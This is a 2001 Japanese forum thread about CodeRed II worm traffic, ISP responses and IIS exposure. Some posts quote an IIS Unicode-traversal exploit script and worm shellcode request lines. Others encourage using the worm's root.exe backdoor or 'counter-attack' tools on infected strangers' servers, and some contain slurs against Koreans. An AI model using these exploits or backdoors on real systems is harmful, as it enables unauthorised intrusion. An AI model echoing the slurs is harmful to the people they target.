316 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:31
rundll32 user32.dll,SwapMouseButton

317 :名無しさん@お腹いっぱい。:2001/08/17(金) 23:51
>>316
面白いけど、相手のマウスが使い難くなっても何の役にも
たたないよな……

318 :305:2001/08/18(土) 00:00
>>308
>>310

「だからCodeRedIIだと言ってるだろうがゴルァ!」と表現を若干和らげて
その旨メールしてやったらzaq.ne.jpからの回答:

>度々恐れ入りますが、
> 2.ポートスキャン、アタックなどであれば、そのポート番号
> 3.上記の現象の発生頻度
>
> 上記の2点につきまして、ご返答いただけますでしょうか。

zaq.ne.jpには「1:通報者は真実を言っているとは限らない。まずは疑って掛かるべし」
ってサポートマニュアルがあるようだね。駄目だこりゃ。国内で最後までCodeRedII
が残るのzaqかも。さすがに切れて >>305 のような内容の返答しときました。

319 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:00
つまり >>298 は改造しないかぎり全然役に立たないってことか(鬱

320 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:09
最盛期からは落ち着いたけど未だに1時間に20件ほどは来てるし。
まだバラ撒いている奴はいい加減晒してもいいんじゃないかとさえ思ってしまうよ。

321 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:14
ZAQ、ASAHIネット、WAKWAK・・・・最後まで生き残るのはどこだ!?

322 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:20
>>321
大学にはかなわん。

323 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:27
>>321
最後なんてくるんだろうか……このまま永遠に……

324 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:32
あんまり登場しないけどiij4uもなかなか凄いっすよ。
感染者いっぱいで病院状態。

325 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:44
絶滅しそうになったら今度は保護活動がしたくなったりして。

326 :名無しさん@お腹いっぱい。:2001/08/18(土) 00:48
絶滅危惧種”code redU”
REDBOOKに載せるんですかぁ〜

327 :  :2001/08/18(土) 01:05
IIJだけどWIN98だから関係無いや。

328 :305:2001/08/18(土) 01:10
根拠ないただのzaq.ne.jp誹謗中傷と思われるとちょっと嫌なので。
8月17日0:00〜24:00の私の所のHTTPD logで、CodeRedIIによるア
タックは全部で144回。そのうち国内プロバイダからの分は
28 zaq.ne.jp
8 alpha-net.ne.jp
5 wakwak.ne.jp
5 eonet.ne.jp
2 infoweb.ne.jp(nifty)
1 odn.ad.jp
という事で、煽りじゃないです。現実にうちでは他のプロバイダからのは
減ってるのに、zaqからのアタックは全然減らなくて、zaqの同一アドレス
で今週初めからずっとアタック続いてる奴すらいる。alpha-netも評判通
りの活躍してますね。

329 :名無しさん@お腹いっぱい。:2001/08/18(土) 01:11
正直、ビシッといってやって欲しい

330 :名無しさん@お腹いっぱい。:2001/08/18(土) 01:55
>>328
あなたのプロバーだーがどこだか分からないと、その統計に関してはコメントできないなぁ。
現にうちはザクからなんてここ1週間着てないもん

331 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:02
>>330
そりゃそうだろうよ。
Address: 211.124.0.131
Aliases: www.zaq.ne.jp

332 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:38
>>330
どうせ328はZAQユーザだろ。うちはJCOMだけど、今までの約3500件の
うちの1/3がJCOMのユーザ仲間からだ。CATVの威力炸裂だね(藁
ログ取り始めたのが今月の7日なのだが、そのときから毎日欠かさずアタック
してくるアホがいる。いい加減気づいてくれよう。

333 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:40
>>328
おいおい、そりゃ君がザキュに近いってことしか
言ってないのでは?
ぃゃ漏れはザキュと関係ないんだけどね。
ウチはバラエティ豊かな202なんで、ホントどこから
でも来てます。国内ではスピードとハイホーって感じ。

334 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:40
反省しる!
http://japan.donga.com/data/20010412/photo/2001041212148.jpg

335 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:48
>>334
これ、元ネタ分からないんだけど。
この人たち天然?それともネタ?

336 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:52
>>213
ネタじゃないのか(w

337 :名無しさん@お腹いっぱい。:2001/08/18(土) 02:58
>>335
コラ

338 :305:2001/08/18(土) 03:21
>>330
>>332
>>333
うちはzaqではないが61.205系なので、それ以外だとどうなってるかは知らん。
ただ1つ言えるのは、少なくともうちのLog見る限りでは、先週までとかは他の
プロバイダーからのアタックもたいへん多かったのでzaqは別に目立たない存在
だった。ところが今週になって他のプロバイダーからのは減ったがzaqは一向に
【減らない】ので目立ってきた。8月12日から今日までずっと固定アドレスで
アタック続けてる奴とかもいる。結果的に今うちのLogではzaqは中国・韓国を
含む全体数の約2割と、他を圧するアタック数を誇っている。それでこいつら
仕事しとるんか?とメール出したらこうなったってわけ。

339 :名無しさん@お腹いっぱい。:2001/08/18(土) 03:27
ああ、感染者が減ったんじゃなくて上流でフィルターかけたのね。
それなら納得。

340 :zaqはね:2001/08/18(土) 03:28
10日付けで返事貰った内容だと。
俺は地方のISP、zaqからは少しだけあって、それもFrontPageでサイトまるまる編集し放題なやつだった。
//
お問い合わせの件でございますが、
ご迷惑をおかけ致しまして誠に申し訳ございませんでした。

 今回お送り頂きました情報で調査しましたところ該当のアクセスは
弊社ユーザーの「CodeRed」感染端末からのワーム活動と判断
されましたので、早速、該当のユーザーに対してCodeRed感染
に対する注意、警告等の対応を実施させていただきます。
以下 長々と謝罪文。。。
結構まともだったぜ。

341 :名無しさん@お腹いっぱい。:2001/08/18(土) 03:42
>>338
あの〜、CR2は1日で感染活動(アタクジャナイ)止めるんスけど。正確にはcnドメインが引けたら48時間で他は24かな?

いやーISPの対応もいろいろあるってのは同感だねー。
この件に関しては文句も何も言ってないけどね。どこにも。

しかしdns.**.co.jpとか来てたりしてて最強にヘボまってしまうよこっちが。

342 :名無しさん@お腹いっぱい。:2001/08/18(土) 04:20
>>341
自己拡散を【止める】のではなく【止めてリブートする】です。
その結果ほぼ確実に再感染する。
また再起動は自己拡散を止めるのが目的ではない。
MS00-052 未パッチでアドミンがログインした場合に
バックドアを有効にするため。
何度もガイシュツですが
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

343 :蛇足:2001/08/18(土) 09:50
>>335
中央にいる方は、歴史教科書問題でハンストデモを行う為
来日した韓国の国会議員です。看板の「しる」は天然です。
両隣りにいる方は、確か社民党の議員です。冷たい人達です。

344 :名無しさん@お腹いっぱい。:2001/08/18(土) 13:02
本文にリンクしてやれよ。
http://japan.donga.com/srv/service.php3?biid=2001041212148

345 :名無しさん@お腹いっぱい。:2001/08/18(土) 13:36
そうか、ハマコウじゃなかったのか。

346 :名無しさん@お腹いっぱい。:2001/08/18(土) 14:08
オレもハマコーだと思ってた・・・

347 :名無しさん@お腹いっぱい。:2001/08/18(土) 14:19
http://www.asahi-net.or.jp/~ki4s-nkmr/
> ただ、今回の混乱の中で明らかになったこととして、PWSが組み込まれていた
> Windows 4.0のWorkStation環境に、Windows 2000 Professional版を
> アップグレード インストールした場合、このPWSがIIS 5.0へ自動的に
> 置き換わるのだそうです。今回の騒動では、この条件のユーザーの大半が
> 自分はIISではなくPWSを利用していると錯覚していたように思います。

> との件ですが、Win98SEでも同様の現象を確認しております。

なんかPWSが入ってたWinをWin2kにアップグレード(笑)すると
PWSもIISに自動アップグレード(笑)されるみたい。

348 :名無しさん@お腹いっぱい。:2001/08/18(土) 14:38
なるほどね、また謎が一つ解決しちゃったね。
連続攻撃はルーターの内側の機械達が力を合わせてがんばっていると
いう事でとりあえず納得出来るし。
「あとはCode RedIIと同時にPort187のNetbios名取得が来るは何故?
何故なの?」ぐらいかな。

349 : :2001/08/18(土) 15:25
うちは、203.x.x.xのせいか、攻撃のほとんどは韓国からです。
韓国逝って良し!

Registryが不明なときは(ほとんど不明だけど)、ここが便利です。
whois -h whois.geektools.com xxx.xxx.xxx.xxx

350 :名無しさん@お腹いっぱい。:2001/08/18(土) 15:38
Win9xで誰がなんと言おうと全部インストールすると決めてるユーザーは2Kアップデートでお陀仏さんになってしまうのか。
危険だと言ってもOSがVAI○だったりS○TECだったりする人達では全面拒否必至だろね。
そんなやつ周りに沢山いるな。つーか今じゃそんなのがフツーじゃん。

351 :名無しさん@お腹いっぱい。:2001/08/18(土) 16:19
なるほどねー。
PWSって、Officeに付いてこなかったっけ?

352 :名無しさん@お腹いっぱい。:2001/08/18(土) 17:02
プリインストールマシンにくっついてくるOfficeには付いてない。
FrontPageがくっついているパッケージには付いている。
FrontPage入れるとPWSも自動で入ります。

あと、SOHOや小規模の企業が2000サーバーに金だすのが嫌で、
Macとのファイル交換用にPWSやIISを内部に立てることが間々ある。
実際やらされた・・・。今どうしてるだろう。
Win2000マシンがあるのにWin2000のCD-ROMがない会社。
たぶん今でもCodeRed送り続けているだろう。

353 :名無しさん@お腹いっぱい。:2001/08/18(土) 17:42
侵入者IPが211〜だったらチョソなの?

354 :名無しさん@お腹いっぱい。:2001/08/18(土) 18:05
つーかCodeRedってIPの近いところを攻撃するから韓国中国からの
攻撃がメインになってあたりまえなんだよな。あちらさんのほうが
ブロードバンド環境は進んでるし。

355 :名無しさん@お腹いっぱい。:2001/08/18(土) 19:18
>>349
今日は一つ得をしたよ
あんたいい人だ
ガキの中のガキ大将って感じだ
これからも宜しく頼むよ

356 :え〜ん:2001/08/18(土) 19:52
>>347
ここ湯名なのね、リンクに加えときます。

357 :え〜ん:2001/08/18(土) 19:52
>>347
お礼忘れた、ありがとさん

358 :名無しさん@お腹いっぱい。:2001/08/18(土) 23:19
FrontpegeってマイクロソフトでダウソできるバージョンでもPwsやらIISやら組み込まれるの??

359 :名無しさん@お腹いっぱい。:2001/08/18(土) 23:44
・太平洋回線は太平洋に面してる日本しか敷設してない
・東西のインターネットゲイトウェイはアメリカにある
ので、韓国がアメリカのインターネットにアクセスするには

[韓国]==(日本海ケーブル)==>[日本のゲートウェイ]==(太平洋ケーブル)==>[アメリカ]

という経路を通らなければならない。これ以外の直接経路は衛星回線のみ。
この中で太平洋ケーブルはほとんど日本の持ち出し。これを韓国はタダで使ってる。
逆にこれを使わないとアメリカには繋げない。
しかしこのままでは韓国のCodeRedで世界が迷惑するのでどうするか?
・日本海ケーブルを閉鎖する。
これをやると韓国のパケットは日本にも来ないのでCodeRed対策としては万全。
タダで使っていた韓国のパケットが太平洋ケーブルから消えるので
本来使用すべき日本の分の回線が空く。
太平洋のケーブルの回線増設も遅らせる事が出来る。
韓国に不都合が起きるのはどうでもいい(細い西回り回線とか高い衛星回線もあるし)

360 :名無しさん@お腹いっぱい。:2001/08/18(土) 23:53
マジでぶった切って欲しいよ、日本海ケーブル・・

361 :ああスレ違い鬱:2001/08/18(土) 23:56
重複スマソ

結構、ネットワークのレベルでのツールが出てきたな。
既出のものも含めてまとめてみた。他にもあったら教え
てくれ。(サーバ単位の診断やパッチは除いた。)

NTK?ツールの名前は分からん。反撃shutdown
 http://ns1.prometheusmedia.com/default.ida
eEyeのCodeRed Scanner 結構痛いスキャンだ
http://www.eeye.com/html/Research/Tools/codered.html
emailで管理者へ通知EarlyBird
http://www.treachery.net/~jdyson/earlybird/
極めつけnet sendで警告メッセージ CodeRed Vigilante
http://www.dynwebdev.com/codered/
CodeRedProve (Probeの間違いの説も 藁)
http://ueno.cool.ne.jp/zeiger/CodeRedProve.zip

こんな感じだから、root.exe?/c+dir くらい、誰も
後ろめたく思っていないみたいだね。

362 :名無しさん@お腹いっぱい。:2001/08/19(日) 00:27
感染して迷惑かけたヤツは光ファィバー1Km敷設させるってのはどう?

363 :名無しさん@お腹いっぱい。:2001/08/19(日) 00:35
韓国政府にメールで抗議ってのはどうかな?
賛同者が多ければ、メールアドレスと英語(韓国語中国語はできないので)のテンプレ作るけど。
それともこーゆー話はニュース板とかでやったほういいのかな?

364 :名無しさん@お腹いっぱい。:2001/08/19(日) 03:45
『日本海ケーブル』は『東海ケーブル』と呼ぶニダ

365 :名無しさん@お腹いっぱい。:2001/08/19(日) 03:52
それじゃ静岡のCATV会社みたいだに。

366 :名無しさん@お腹いっぱい。:2001/08/19(日) 03:53
>>361
まとめありがとう。早速Vigilanteを動かしてるよ♪

367 :名無しさん@お腹いっぱい。:2001/08/19(日) 04:29
ん〜、減ってきたようにも見えるけど。
これって、気づいてない奴は一生気づかないような気が・・・

368 :名無しさん@お腹いっぱい。:2001/08/19(日) 07:18
つーか一番悪いのはCodeRedの製作者だろ

369 :名無しさん@お腹いっぱい。:2001/08/19(日) 07:20
>>359
そういった回線共有を否定することはインターネットを否定することじゃん。

370 :名無しさん@お腹いっぱい。:2001/08/19(日) 07:30
Name: nttkgwa03102.ppp.infoweb.ne.jp
Address: 61.124.33.102

371 :名無しさん@お腹いっぱい。:2001/08/19(日) 10:06
>>369
そういう声が出るって事は「あの国」にはインターネットは分不相応な
システムだって事だね。コピーシステム使っている奴ってWindowsUpdate
のボタンを押せないんだよ。惨めな連中だ。

372 :名無しさん@お腹いっぱい。:2001/08/19(日) 14:08
変種が来た。1バイトだけ違うの。
00000000 C8 C8 01 00 60 E8 03 00 00 00 CC EB FE 64 67 FF
(略)
00000810 30 00 00 00 04 00[08]00 10 00 00 00 00 00 00 00
                   ↑このへん

373 :大丈夫かな?:2001/08/19(日) 14:43
ここから80番ポートに結構アクセスが来るのだが、
CodeRedなのか?

>> 2001年8月19日14時38分37秒 HttpHead - 210.136.88.94

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Sun, 19 Aug 2001 06:04:42 GMT
Content-Length: 3264
Content-Type: text/html

374 :名無しさん@お腹いっぱい。:2001/08/19(日) 14:48
最近、CodeRedそのものよりも、どさくさにまぎれてとか、
プロバイダが会員の安全のためと称してポートスキャンかけ
たりとかで来るアタックのほうが多いかもしれない。

少なくともHTTP port probe のすべてがCodeRedという
わけじゃあないよ。

375 :大丈夫かな?:2001/08/19(日) 14:54
>>374
そっかぁ。ルーターがブロックしてくれるからいいけど、
有名企業からだと心配になるんだよねぇ。

眺めてるだけにしますわ(^^;

376 :名無しさん@お腹いっぱい。:2001/08/19(日) 16:14
20日をすぎると、感染端末はホワイトハウスを攻撃するんでしょうか?
攻撃機能はCode Red (original)にはありましたが、Code Red2にも組みこまれて
いるんでしょうか?
おしえて、えらい人

377 :名無しさん@お腹いっぱい。:2001/08/19(日) 16:27
>>376
ホワイトハウス攻撃機能はないと聞きました。情報源は忘れました。まあ、究極的に
はeeyeのディスアセ見れば判るんでしょうが。
CodeRedに対する報復としてUSの誰かが作成したバージョンだっていう意見もありま
すしね。もっとも本当の意図は作成者の味噌汁。

378 :名無しさん@お腹いっぱい。:2001/08/19(日) 18:11
>>377
>>2さんのリンク↓にあるよ。
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html
★Code Red★
 日付により行動パターンを変更
 1日 - 19日 他のホストに感染する
 20日 - 27日 whitehouse に DDoS 攻撃をする
 28日- 月末 休眠する。
★Code Red II★
 感染後 24〜48時間感染行動を続け、
 その後サーバをリブートし感染を停止
 2001年 10月 1日以降は活動を停止

379 :名無しさん@お腹いっぱい。:2001/08/19(日) 18:45
うちの場合CodeRedと思われるのはUSとかCAとかAUからのアクセスの方が多かった。
あとは典型的なポートスキャン野郎くらいだな。

380 :名無しさん@お腹いっぱい。:2001/08/19(日) 18:49
うち(203.x.x.x)だとCode Redはレアもの
過去24時間でNNNNNNNが1/62、XXXXXXXが61/62
この調子が当分続くのね

381 :名無しさん@お腹いっぱい。:2001/08/19(日) 19:15
上がったんで気が付いたんだが
http://ton.2ch.net/test/read.cgi?bbs=sec&key=994160787
ここの18,19の書き込みIISのバッファオーバーフロー攻撃のやりかた
知ってたようだな。

382 :名無しさん@お腹いっぱい。:2001/08/19(日) 19:16
18 名前:27 投稿日:2001/07/05(木) 01:02
#!/usr/bin/perl

use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-HACK-PROGRAM

Example: c:\\perl uni.pl www.theriver.com:80 {OR}
c:\\perl uni.pl 127.0.0.1:80\n";}
($host,$port)=split(/:/,@ARGV[0]);
print "Trying $host.....................\n";
$target = inet_aton($host);
$flag=0;

# ---------------test IF IIS
my @results=sendraw("GET x HTTP/1.0\r\n\r\n");
foreach $line (@results)
{
if ($line =~ /Server: Microsoft-IIS/)
{


19 名前:27 投稿日:2001/07/05(木) 01:04
sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+\\winnt\\system32\\cmd.exe+root.exe HTTP/1.0\r\n\r\n");

383 :名無しさん@お腹いっぱい。:2001/08/19(日) 19:32
それはsadmindの手口。バッファフローじゃなくてshellの相対パスの
脆弱性ってやつ。

384 :名無しさん@お腹いっぱい。:2001/08/19(日) 19:36
>>381-382
それ、昨日うちに来たよ。なぞが解けたthnx
-------Access Log-------
209.111.91.22 - - [18/Aug/2001:03:37:53 +0900] "GET x HTTP/1.0" 501 159 - -
------------------------

385 :名無しさん@お腹いっぱい。:2001/08/19(日) 20:41
>>383
ほんとだよく読んだらちがった。鬱だ芯でいい?

386 :名無しさん@お腹いっぱい。:2001/08/19(日) 20:55
スレ、途中で質問いい?

 俺のところの東急ケーブルは、プライベートIPで配ってるくせに
ウェブサイトで赤虫を警告してるんだけど、赤虫ってプライベートIPのIIS
にも感染できるの?

 ゲートウェイでNATがかかってるので、感染できないって思ってたんだけど。
つうか、プライベートIPでIISって言うのも理解できないよ。

387 :名無しさん@お腹いっぱい。:2001/08/19(日) 21:00
企業の内部ネットワークもやられているくらいだからな。

ボケが感染したノートPCを持ち込んだりすると、一気に
プライベートなLAN内赤虫だらけ。IISは既出のように、
本人も意識しないで、インストールされてしまうことも
ある。

388 :名無しさん@お腹いっぱい。:2001/08/19(日) 21:36
>>386
CATVと併用して他のダイヤルアップやADSL、専用線等を使用しているとそいつが外部から感染してそれが一気にCATV域内に流れ込むんだよ
例えファイヤーウォールのあるLANを構築していてもIISが外部からのアクセスを許していると無意味、感染するとLANを通して域内にも攻撃を仕掛ける
CATVが流入を食い止めてもユーザーが裏口作ってセキュリティをガタガタにしてるわけ

389 :388:2001/08/19(日) 22:05
ところで十Q毎日のように感染マシンが増えてるな
夏休みの宿題でIISインストールしてホームページでも作ってるのか?
DNS名が SOTEC-E4150AV にはワラタ

390 :名無しさん@お腹いっぱい。:2001/08/19(日) 22:09
>>389
それは、NetBIOS名かと思われ。
うちは OTOSAN ってのが居た。

391 :名無しさん@お腹いっぱい。:2001/08/19(日) 22:12
おぉ、ファザーコンピューター。マザーが停止したときに
目を覚ますやつだな。

392 :名無しさん@お腹いっぱい。:2001/08/19(日) 22:19
>>390
ってことはNetBIOSoverTCP/IPも有効にしてるのか
それにしても全角の物もあるけどNetBIOSって全角文字も使えるとは知らなかった

393 :名無しさん@お腹いっぱい。:2001/08/19(日) 22:21
>>388

 感染経路として他回線との併用ですか・・・。

 網内の感染したホストから、再び外部のグローバルIPに戻ることも
考えられますね。それって、東急ケーブルテレビが網内に赤虫が
入ってるって検知してるのでしょうか。

394 :名無しさん@お腹いっぱい。:2001/08/19(日) 22:24
>>386
109警告してるだけ良いぞ。

うちのプロバは、警告を出すと驚いたユーザがIIS止めてしまって
赤虫の捕捉できなくなるから、わざと警告しないと豪語している。

395 :名無しさん@お腹いっぱい。:2001/08/19(日) 22:49
>>394
「なるほど〜、じゃあ、赤虫をさぞかし一生懸命捕捉しているのですね〜☆ミ」
という突っ込みをなさってはいかが。

396 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:16
>>391
w

http://jun.ient.or.jp/~ishikawa/OTOSAN/otos1.html

397 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:16
>>395
したよ。
週末は当然サポートも技術もお休みなので、ユーザからの声は受け付
けていません。藁)
4日前にきた同一プロバの感染者、また再感染したようだ。(NetBIOS
名から判断)。マジ、この機会にプロバ変えたほうがいいかもな。

>>393
そんなヘタレなプロバでも、域内で赤虫の存在は知っているようだか
ら、等級も知って動いてんだろう。CodeRedとは異なる感染検知のた
めのスキャンとか時々来ないか?

398 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:16
ttp://search.cpan.org/doc/REUVEN/Apache-CodeRed-1.07/CodeRed.pm

あほだ、こいつ。

399 :名無しさん:2001/08/19(日) 23:23
>>361

>NTK?ツールの名前は分からん。反撃shutdown
>http://ns1.prometheusmedia.com/default.ida

これ家の鯖に仕込んだらやっぱマズイかなぁ・・・・
なんか面白そうなんだけどさぁ。。。

400 :名無しさん@お腹いっぱい。 :2001/08/19(日) 23:28
                   _ , -―-、
              , 'ニニニ、::::(0::::::::::ヽ、
                ̄ ̄ヽ':::::::::::::::  ヾ みてごらん この糞スレを
                   ):::  ....   \
                  /    ::::::::::::::::::ヽ
                  /      :::::::::::::::::|
                 /       :::::::::::::::::|
                 /        :::::::::::::::::::|
                /        ::::::::::::::::::::|
                |         :::::::::::::::::::::|
               . |         :::::::::::::::::::::|
          _ , ―-、|         /::::::::::::::/::::|
          \ヲ'⌒ヽ:|         /:::::::::::::::/::::::|
            ト`_ ノ::|        /:::::::::::::/::::::::|
           人;;;;;;;::::;:|        |:::::::::::::/::::::::/
          /γ  `:::::|       |::::::::::::/::::::::/
          / (  ヽ   :::|       |:::::::::/::::::::/   ふーん、なんだか
         {  )  }  ::|       |::::::::{::::::::/    頭悪そうだね、ぱぱ
          | /   〉   ::|       .ヽ::::|:::::::/
          } {  /   ::|       .ヽノ ::::/
          } |  (    :λ         :::|
         ( ヽ、 〉    ノヽ        ::::|
          ヽ,   ~    〈  ト、_  |    ::::::ヽ、
          (     ,' ノ  |   |~7  ::::::::::::::`ヽ、
           ヽ,、,、,γ' ノ, -‐W~フ {  ト、:::::::::::::::::::ヽ、
          ∠____ト-┘z__,―' ̄Σ Z  ̄ヽ―-、_ノ
                    '―z_,┴'~

401 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:28
>>398
こんなものが全世界に展開されたらSecurityFocusに対するDDoSだっつーの。
作者は訴えられるかも。

402 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:30
>>400 Getさん。
Tuxくんマンセーな方ですかねえ。でも、ageてるし。

403 :名無しさん:2001/08/19(日) 23:35
おれもビオランテ入れてみた。HTTPDと共存できんのがいまいちだが結構良く
出来てる。走らせても「相手の情報(データ)を一切入手する事がない」点が
ポイントかな。-v -l オプション付けといた方がいいだろうね。

> 極めつけnet sendで警告メッセージ CodeRed Vigilante
> http://www.dynwebdev.com/codered/

404 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:38
>>399

漏れはこれにしておいた。shutdownはまずかろう。さすがに。

>極めつけnet sendで警告メッセージ CodeRed Vigilante
> http://www.dynwebdev.com/codered/

405 :名無しさん@お腹いっぱい。:2001/08/19(日) 23:39
>>403 スマソかぶった。
Vigilante大人気!

406 :399:2001/08/19(日) 23:49
>>404

やっぱそう思う?
う〜ん・・・じゃ、やっぱやめとこ。。

407 :404 404 - ファイル未検出:2001/08/19(日) 23:59
>>406

仮にそいつが1日に数百万円稼ぐECサイトだったらどーするよ?
やめといて賢明。Vigilanteにしとけ。

408 :名無しさん@お腹いっぱい。:2001/08/20(月) 00:13
>>406
というか、それ以前にそのシャットダウンは動かないから意味ないよ

409 :名無しさん@お腹いっぱい。:2001/08/20(月) 00:23
[20/08/01 00:20:09 JST] Decaffeinator: 49 of 172 total servers successfully decaffeinated.

Vigilanteの成功率は1/4〜1/3くらいだなあ。こんなもの?

410 :名無しさん@お腹いっぱい。:2001/08/20(月) 02:49
どさくさに紛れてのftp/telnetが増えてきた・・・
どれも.tw

411 :名無しさん@お腹いっぱい。:2001/08/20(月) 04:48
>>409

手動でroo.exe?/c+dirしても、半分逝くかどうかだから
ねえ。

バックドアが仕込まれて、しかも再感染して回りを再攻撃
していて、なおかつAdminでログオンしていないとダメだ
から1/4なら上等。

412 :名無しさん@お腹いっぱい。:2001/08/20(月) 09:05
*.bai.ne.jp からしつこーく来るので管理者にメールしようかと
思うんすけど、これってどこのISP?

413 :名無しさん@お腹いっぱい。:2001/08/20(月) 10:03
>>412 それくらい自分で調べろYO!
ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=BAI.NE.JP

ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=ns1.gao.ne.jp

ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.171.0.34

414 :名無しさん@お腹いっぱい。:2001/08/20(月) 11:54
なんだこれ? "GET /default.ida?"がなくて"HTTP/1.1"

203.90.1.151 - - [20/Aug/2001:10:42:25 +0900] "XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 400 167 - -

415 :名無しさん@お腹いっぱい。:2001/08/20(月) 12:07
>>414
何度も何度も激しく激しくガイシュツ

416 :名無しさん@お腹いっぱい。:2001/08/20(月) 16:41
[海外]コードレットワームのケーブルやDSLへの被害が拡大(BCN)
http://news.yahoo.co.jp/headlines/bcn/010820/cpt/15200000_bcncpt007.html

417 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:09
一ヶ月たったね

418 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:19
インターリンク、終息宣言
http://www.interlink.or.jp/notification/backno/2001/info016.html

ユーザ様の怒りはまだまだ解けていないようですが・・・

419 :名無しさん@Emacs:2001/08/20(月) 17:29
>一定の安全が確認されたことと、20日からはウィルスが休止状態となると言われて
>いることから、今回設置を解除することとなりました。
ぶん殴っていい?

420 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:33
やっぱりぶつぶつ切れるぞゴルァァメールに耐えられなかったんでしょう

421 :名無しさん@お腹いっぱい。:2001/08/20(月) 17:53
>>419
誰かメールしてやらないと、コードレッド少なくともインターリンク
のユーザーが最後まで残る、ケケケ

422 :名無しさん@お腹いっぱい。:2001/08/20(月) 18:46
プライスロトのこの騒ぎ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=998241038
これってやっぱりCodeRedIIのバックドアからIISにしかけられて、
それを見たクライアントPCに被害が拡大という最悪のケースかしら?

423 :あああ:2001/08/20(月) 21:09
既出ならスマソ

defalut.idaにcon\con仕掛けたらどうなる?

424 :あああ:2001/08/20(月) 21:10
スマソwin2000意味無いね(鬱打診で来る

425 :名無しさん@お腹いっぱい。:2001/08/20(月) 21:16
210.81.49.140 - - [20/Aug/2001:14:07:41 +0900]
210.81.49.143 - - [20/Aug/2001:16:38:32 +0900]
Apple Japan の Code Red II 二匹捕捉。ライバル OS 使うなよ (w

426 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:36
>>422
それはActiveXのセキュリティーホールが原因。
IE5.5やOutlookから感染するみたい。

427 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:39
>>426
Outlookでも感染するの?
OEは駄目そうだが。

428 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:49
>>426
パッチ当ててないIIS鯖が書き換えられた事を言っているのでは?

429 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:52
プライスロトがIIS使っててCodeRed感染→Web改竄→ActiveXでトロイ仕込まれる
って流れでよいのかしら?

430 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:53
>>426-427
つかMicrosoft VMの問題で、htmlファイルを表示すれば何でもやられる模様↓
http://www.microsoft.com/japan/technet/security/SecFaq.asp?sec_cd=ms00-075

431 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:56
http://www.priceloto.com/newscontent.asp?number=49&page=1&startpage=1
赤虫に感染していた可能性は高いね

432 :名無しさん@お腹いっぱい。:2001/08/20(月) 23:58
とうとうCode Red IIの二次攻撃が始まったな・・

433 :名無しさん@お腹いっぱい。:2001/08/21(火) 00:21
この期に及んでパッチ当ててなかったのかしら

434 :名無しさん@お腹いっぱい。:2001/08/21(火) 00:22
http://puyon.pns.to/ida/baka_servers.txt

幹線サーバーのIP晒してるページって結構あるのね、、、
怖い怖い

435 :名無しさん@お腹いっぱい。:2001/08/21(火) 01:45
うーん。プライスロトみたいな事があるなら、企業で感染してる所は
晒した方が自衛になったんじゃないのかなぁ。

436 :名無しさん@お腹いっぱい。:2001/08/21(火) 01:58
言えてる。
これから企業の感染ホスト名は晒して、皆でnet send攻撃しよう(w

437 :名無しさん@お腹いっぱい。:2001/08/21(火) 17:02
まだいっぱい来るんで、あげ。

438 :名無しさん@お腹いっぱい。:2001/08/21(火) 17:54
http://takuomix.homeip.net/codered.log
感染サーバー晒しあげ

439 :名無しさん@お腹いっぱい。:2001/08/21(火) 17:54
これはコードレッドワムですか?

http://www.mietsu.tsu.mie.jp/
2001年7月25日にサーバーが攻撃され、ドメインコントローラーを奪われました。
そのため、従来のサービスを続けられなくなりました。
お詫びいたします。
今後の運営について検討中です。

440 :名無しさん@お腹いっぱい。:2001/08/21(火) 18:03
7/25なら違うと思われ

441 :>:2001/08/21(火) 18:47
赤虫U、再び増加傾向か?
http://www.security.nl/misc/codered-stats/

442 :名無しさん@お腹いっぱい。:2001/08/21(火) 19:00
>>441
私も見ましたが週単位の周期のような気も

443 :名無しさん@お腹いっぱい。:2001/08/21(火) 21:05
このスレもそろそろ終わりかねえ。
もっとも、慣れた頃が危ないのかもしれないが。

444 :名無しさん:2001/08/21(火) 21:13
444GET

>>443

慣れたっていうより飽きたんじゃないっすか?(w

445 : :2001/08/21(火) 23:25
今日ようやくOCN本体から「赤蟲警告」のメールが来た
危険なワームなので即対応してくださいだって・・・


おせーーーーーーーーーーーーーーーーーーーーー



ふぅ、すっきり

446 :名無しさん@お腹いっぱい。:2001/08/21(火) 23:33
